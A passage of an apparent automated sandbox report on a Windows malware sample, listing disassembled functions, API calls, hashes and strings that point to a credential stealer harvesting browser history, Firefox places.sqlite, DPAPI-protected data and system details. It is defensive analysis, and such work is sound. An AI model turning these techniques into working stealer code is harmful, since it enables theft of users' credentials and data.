                  • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                  APIs
                  • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: NameUser
                  • String ID:
                  • API String ID: 2645101109-0
                  • Opcode ID: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
                  • Instruction ID: 5a5990060c673b8f00593b581c9a0ee3644ab744bab1f058c1932740bd518d27
                  • Opcode Fuzzy Hash: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
                  • Instruction Fuzzy Hash: 1BE0DFB12083424FC3119BA8D880AA53BE49F49300F044876B8D5C72E1FE35CE248753
                  APIs
                  • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: NameUser
                  • String ID:
                  • API String ID: 2645101109-0
                  • Opcode ID: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
                  • Instruction ID: 7803372b71e91cd4900786e151d6695f3fca8b78fda9d7e8201226f5ab6c0eae
                  • Opcode Fuzzy Hash: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
                  • Instruction Fuzzy Hash: D7E08CB16043065BD3109AA8D880AAA76E89B88300F00493AB89AD73D0FE39CE248647
                  APIs
                  • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide
                  • String ID:
                  • API String ID: 626452242-0
                  • Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                  • Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
                  • Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                  • Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC
                  APIs
                  • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeVirtual
                  • String ID:
                  • API String ID: 1263568516-0
                  • Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                  • Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
                  • Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                  • Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A
                  APIs
                  • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeVirtual
                  • String ID:
                  • API String ID: 1263568516-0
                  • Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                  • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
                  • Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                  • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
                  APIs
                  • LocalAlloc.KERNEL32(00000000,00000644,?,0041C5D4,00401247,?,?,00401447,?,00100000,00002000,00000004,0041C5E4,?,?), ref: 004011F7
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocLocal
                  • String ID:
                  • API String ID: 3494564517-0
                  • Opcode ID: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
                  • Instruction ID: 1b97f869ca2ef78b7edf313f24570502d3759f43221a4d236e640dffafdc993f
                  • Opcode Fuzzy Hash: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
                  • Instruction Fuzzy Hash: 5FF05E727402119FD714CF69D8806A577E6EBAD315F20847ED185E77A0E635AC418B48
                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,?,0041A212), ref: 00414115
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                    • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeString$FileFindFirst
                  • String ID: .LNK$._.$8?A$T_@
                  • API String ID: 1653790112-814392791
                  • Opcode ID: 31d205d8936ed6a38841222a8d26b5fdb0abdb355bc219240a33d41e848b65df
                  • Instruction ID: ccf2d574420f699031c81d78e58b697f7985245bee10ad08c344e755ebce9b4b
                  • Opcode Fuzzy Hash: 31d205d8936ed6a38841222a8d26b5fdb0abdb355bc219240a33d41e848b65df
                  • Instruction Fuzzy Hash: C2223F74A0011E9BDB10EF55C985ADEB7B9EF84308F1081B7E504B7291DB38AF868F59
                  APIs
                  • GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                    • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeString$InfoSystem
                  • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                  • API String ID: 4070941872-1038824218
                  • Opcode ID: a830d23d120f7b9ebe103f2a948a2eedfedda67d2e02658d048cf10135b33262
                  • Instruction ID: 196081fafed7d9336189c07f5dab181bd8ca6178f74fa25acf8eb9a608d7e1b8
                  • Opcode Fuzzy Hash: a830d23d120f7b9ebe103f2a948a2eedfedda67d2e02658d048cf10135b33262
                  • Instruction Fuzzy Hash: C541F274A00108ABCB01EFD1D842FCDBBB9EF48305F91813BF504B7296D679EA468B59
                  APIs
                    • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FD4,?,00000000,?,00000000,?,00413361,00000000,00000000,00413B6D,?,00000000,00000024), ref: 00412E0B
                  • FindNextFileW.KERNEL32(?,?,0041C91C,00412FFC,?,00412FFC,0041A212,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F5D
                  • FindClose.KERNEL32(?,?,?,0041C91C,00412FFC,?,00412FFC,0041A212,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F6E
                    • Part of subcall function 00412974: GetTickCount.KERNEL32 ref: 004129B8
                    • Part of subcall function 00412974: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
                  • String ID: .txt$\*.*$\History
                  • API String ID: 3908936366-2232271174
                  • Opcode ID: 2a1da71cf4f321e8de6e9cdad0ec5a278b95c9ebbcb772d71ff5e323f66530a5
                  • Instruction ID: b8b382f9890bf67c4ce716ca2eff32e8703a5b333aba7ace94e6d5da5dd104b6
                  • Opcode Fuzzy Hash: 2a1da71cf4f321e8de6e9cdad0ec5a278b95c9ebbcb772d71ff5e323f66530a5
                  • Instruction Fuzzy Hash: 14514C749042199BCF50EF61CD89ACDBBB8FB48304F5041FAA108B3291DB789F959F14
                  APIs
                    • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                  • FindFirstFileW.KERNEL32(00000000,?,00000000,0041328E,?,00000000,?,00000000,?,00413A53,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004130CF
                  • FindNextFileW.KERNEL32(?,?,0041C80C,004132B8,?,004132B8,0041A212,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413217
                  • FindClose.KERNEL32(?,?,?,0041C80C,004132B8,?,004132B8,0041A212,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413228
                    • Part of subcall function 0041253C: GetTickCount.KERNEL32 ref: 00412580
                    • Part of subcall function 0041253C: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
                  • String ID: .txt$\*.*$\places.sqlite
                  • API String ID: 3908936366-3919338718
                  • Opcode ID: a040b60dfd4019a5a45722e27576c59aa6b8ef46a9cb7f8d1a2c5635a72954e7
                  • Instruction ID: db2ad4c0925ffecf13339862ae006cc807f871b19183d5a4da560477eb916681
                  • Opcode Fuzzy Hash: a040b60dfd4019a5a45722e27576c59aa6b8ef46a9cb7f8d1a2c5635a72954e7
                  • Instruction Fuzzy Hash: 50512E749042199FCF50EF62CC89ACDBBB9EB48305F5041FAA508B3251DB399F858F18
                  APIs
                    • Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
                    • Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5
                  • GetCommandLineA.KERNEL32 ref: 00404CD7
                  • GetVersion.KERNEL32 ref: 00404CEB
                  • GetVersion.KERNEL32 ref: 00404CFC
                  • GetCurrentThreadId.KERNEL32 ref: 00404D38
                    • Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                    • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                    • Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                  • GetThreadLocale.KERNEL32 ref: 00404D18
                    • Part of subcall function 00404BA8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404C0E), ref: 00404BCE
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                  • String ID:
                  • API String ID: 3734044017-0
                  • Opcode ID: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
                  • Instruction ID: 1721a3a9195e16165242481212ff4b6f39af3106f899a404dc8ffc4097ba6689
                  • Opcode Fuzzy Hash: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
                  • Instruction Fuzzy Hash: 210152F0881341D9D310BFB29C863893EA0AF89348F51C53FA2407A2F2D77D40448BAE
                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053,00000000,00000000,00000000,?,00411CBE,00000000,00000000), ref: 00411678
                    • Part of subcall function 004112D0: GetTickCount.KERNEL32 ref: 00411315
                    • Part of subcall function 004112D0: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                  • FindNextFileW.KERNEL32(?,?,0041C91C,00411988,?,00411988,0041A212,00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053), ref: 004118B1
                  • FindClose.KERNEL32(?,?,?,0041C91C,00411988,?,00411988,0041A212,00000000,?,00000000,0041195E,?,00000000,?,00000000), ref: 004118C2
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
                  • String ID: .txt$\*.*
                  • API String ID: 4269597168-2615687548
                  • Opcode ID: b7cd697545d2fa5f0459fee9811f7de309a2d0ba5142d04c105a288026d75c75
                  • Instruction ID: 5d1a81ccab342788691620b24a62b0bf455cea36908fa984f2d283373c0e855c
                  • Opcode Fuzzy Hash: b7cd697545d2fa5f0459fee9811f7de309a2d0ba5142d04c105a288026d75c75
                  • Instruction Fuzzy Hash: 40813C7490011DAFCF11EB51CC56BDDB779EF44304F6081EAA218B62A1DB399F858F58
                  APIs
                    • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
                  • FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
                  • FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB
                    • Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
                    • Part of subcall function 00410D88: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
                  • String ID: .txt$\*.*
                  • API String ID: 3908936366-2615687548
                  • Opcode ID: a356d1aef104fc62a0d83e0f23b15265d56114936feeb0c962a9a187a5f7b3d1
                  • Instruction ID: bf64687dc2ad86eb18c2fbcd59d677e1e6eaf9ec35dfa69074ee7f3f85d2a588
                  • Opcode Fuzzy Hash: a356d1aef104fc62a0d83e0f23b15265d56114936feeb0c962a9a187a5f7b3d1
                  • Instruction Fuzzy Hash: 25514B749052199FCF61EF61CD85ACDBBB8EB48304F5081FAA508B32A1DB389F858F54
                  APIs
                    • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
                  • FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
                  • FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB
                    • Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
                    • Part of subcall function 00410D88: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
                  • String ID: .txt$\*.*
                  • API String ID: 3908936366-2615687548
                  • Opcode ID: b15686dc8056511c22f6009974073d3ef52242b41c6c0f73cd0f87596a77949b
                  • Instruction ID: 460237bab6dc973d40a851033a2d7f34c10cc3b5c211c467e1e524dd2a58d6ff
                  • Opcode Fuzzy Hash: b15686dc8056511c22f6009974073d3ef52242b41c6c0f73cd0f87596a77949b
                  • Instruction Fuzzy Hash: E9511C749052199FCF61EF61CD89ACDBBB9EB48304F5081FAA508B3261DB389F858F54
                  APIs
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A631
                  • LocalFree.KERNEL32(?), ref: 0040A656
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotect
                  • String ID:
                  • API String ID: 1561624719-0
                  • Opcode ID: fa74fd686d8bb1450554d7fdbc3acb5fa010225d01e5a33861605ec384d54b81
                  • Instruction ID: 789b43464e992449ae21f91847352ccfea11bbcfb58c617e1741a13a3b8d6e83
                  • Opcode Fuzzy Hash: fa74fd686d8bb1450554d7fdbc3acb5fa010225d01e5a33861605ec384d54b81
                  • Instruction Fuzzy Hash: 85F0BEB1344300ABD310EE69CC82B4BB7E8AB84700F14893E7698EB2D1D639E955875A
                  APIs
                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404C0E), ref: 00404BCE
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: 40f00df29b06f7f47e29b3e36becc3853c792834bf1450727d1b9494e9aa0756
                  • Instruction ID: 4cf5545a5668d2b6934dff5f8e722f533bd1fe9dd63670d657e80fcd03084d14
                  • Opcode Fuzzy Hash: 40f00df29b06f7f47e29b3e36becc3853c792834bf1450727d1b9494e9aa0756
                  • Instruction Fuzzy Hash: 77F0C870A0420DAFE715DF91CD41ADEF77AF7C5714F50883AA610772D0E7B86A00C698
                  APIs
                    • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
                  • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                  • API String ID: 763169861-1556614757
                  • Opcode ID: 3dabca578a80f5a72b4bbe57d97a85dc37324ae0374c3875346d0a4ab4ac3a91
                  • Instruction ID: 26d77c896aabed61a2775ccb06ba61d1ee422efe4d6d96ca95dbfc380ed6e43d
                  • Opcode Fuzzy Hash: 3dabca578a80f5a72b4bbe57d97a85dc37324ae0374c3875346d0a4ab4ac3a91
                  • Instruction Fuzzy Hash: DA91D9B06402049FD712EF69D885B9A37E8BF4A349F00847AF404EB7A6C778AD44CB5D
                  APIs
                    • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
                  • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                  • API String ID: 763169861-1556614757
                  • Opcode ID: a16eaeec054c51931e14f5265a1c09e3020d9e051cf30a86899ec13f16d3cac9
                  • Instruction ID: 5b3c55801863a32800eae0c5f30943bce4d4c5d0b2659c2e20ef893ba67f7cd3
                  • Opcode Fuzzy Hash: a16eaeec054c51931e14f5265a1c09e3020d9e051cf30a86899ec13f16d3cac9
                  • Instruction Fuzzy Hash: A991E8B06402049FD711EF69D885F9A37E8BF49349F00847AB404EB7A6C778AD44CB9D
                  APIs
                    • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
                  • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                  • API String ID: 763169861-1556614757
                  • Opcode ID: ce2ff15e378b2bb7b4fef2ac6f55289aba182e4e6d2a742e5fc03b537afcb1c4
                  • Instruction ID: 26c99af69019636de113f168175dae5416f6f3cc59ad43c6f3cb6d4c520b39b5
                  • Opcode Fuzzy Hash: ce2ff15e378b2bb7b4fef2ac6f55289aba182e4e6d2a742e5fc03b537afcb1c4
                  • Instruction Fuzzy Hash: A191D7B06402049FD711EF69D885F9A77E8BF49349F00847AB404EB7A6C778AD44CB9D
                  APIs
                  • GetSystemMetrics.USER32(00000000), ref: 00416AD3
                  • GetSystemMetrics.USER32(00000001), ref: 00416AEA
                    • Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                  • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F
                    • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                    • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
